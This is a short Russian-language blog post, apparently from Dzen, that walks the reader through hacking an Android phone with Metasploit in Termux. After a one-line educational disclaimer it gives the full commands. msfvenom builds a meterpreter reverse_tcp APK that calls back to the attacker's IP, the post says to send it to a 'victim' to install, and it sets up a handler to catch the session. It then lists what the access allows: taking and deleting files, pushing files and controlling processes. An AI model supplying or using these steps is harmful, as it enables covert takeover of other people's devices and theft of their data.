Найти в Дзене

Metasploit on Termux. Взлом андроида.

Данная статья предоставляется лишь для образовательных целей. 

Автор лишь хочет донести до читателей, что нужно быть внимательным и осторожным при установке различного ПО.

Нам понадобится смартфон или планшет с установленной программой "Termux". Также в Termux уже должен быть установлен "Metasploit". 

pkg update

Далее нужно перейти по следующему пути, введя команду

/data/data/com.termux/files/usr/opt/metasploit-framework

Введя команду ls вы должны увидеть примерно это:

-2

Теперь создаем файл который будем кидать жертве, командой

msfvenom -p android/meterpreter/reverse_tcp LHOST=(наш IP) LPORT=4444 R> /sdcard/payload.apk

-3

Теперь нужно скинуть его жертве и жертва должна установить этот apk файл на своё устройство. Допустим жертва установила apk на своё устройство. Мы же запускаем metasploit и поочередно вводим каждую команду

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LPORT 4444

Если всё прошло успешно, вы получите полный доступ к устройству жертвы. Введя команду help можно будет посмотреть список доступных команд. Вкратце расскажу, что можно будет сделать:

Скачивать, удалять файлы жертвы

Скидывать в его устройство свои файлы

Посмотреть полную информацию о его устройстве

Контролировать процессы уст

ройства.